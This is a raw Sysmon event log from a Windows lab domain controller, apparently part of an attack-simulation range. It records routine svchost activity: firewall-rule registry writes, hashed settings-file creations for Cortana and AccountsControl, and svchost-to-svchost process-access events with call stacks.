12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C0A81724-20CF-4CA9-9E89-80003929B603}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 
13241300x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{65920A41-3AB7-4996-A8EB-9C75872C275D}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 11241100x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.632 23542300x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.ftMD5=F256707B0901454854702BF58E4DEF0B,SHA256=2603EF3B568C277FF92E75593C0969A0E24291BBC9419080B77D567A53825ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.dataMD5=09924E1BACD1740F5906D89DD6905D99,SHA256=98C574D4894041260AB499048E2B5CB9F58A58AA42B5DDFAE9C44D2BEEA9023D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.2.filtertrie.intermediate.txtMD5=C204E9FAAF8565AD333828BEFF2D786E,SHA256=D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.1.filtertrie.intermediate.txtMD5=34BD1DFB9F72CF4F86E6DF6DA0A9E49A,SHA256=8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.0.filtertrie.intermediate.txtMD5=F975464F45E06A57B8FE3C4FFE644599,SHA256=41B65982C681DAFBA517CEA1878436C4FE1500C161A00B9A916661DB425D5FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.indexMD5=D38A175DD3C786FE6065A00AD306D74F,SHA256=57D9784D2866D21A61FA5FB04373807EDCBF7FAF298A2894C482A6EA80D419FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.ftMD5=F256707B0901454854702BF58E4DEF0B,SHA256=2603EF3B568C277FF92E75593C0969A0E24291BBC9419080B77D567A53825ED1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.dataMD5=09924E1BACD1740F5906D89DD6905D99,SHA256=98C574D4894041260AB499048E2B5CB9F58A58AA42B5DDFAE9C44D2BEEA9023D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.2.filtertrie.intermediate.txtMD5=C204E9FAAF8565AD333828BEFF2D786E,SHA256=D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.1.filtertrie.intermediate.txtMD5=34BD1DFB9F72CF4F86E6DF6DA0A9E49A,SHA256=8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.0.filtertrie.intermediate.txtMD5=F975464F45E06A57B8FE3C4FFE644599,SHA256=41B65982C681DAFBA517CEA1878436C4FE1500C161A00B9A916661DB425D5FB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.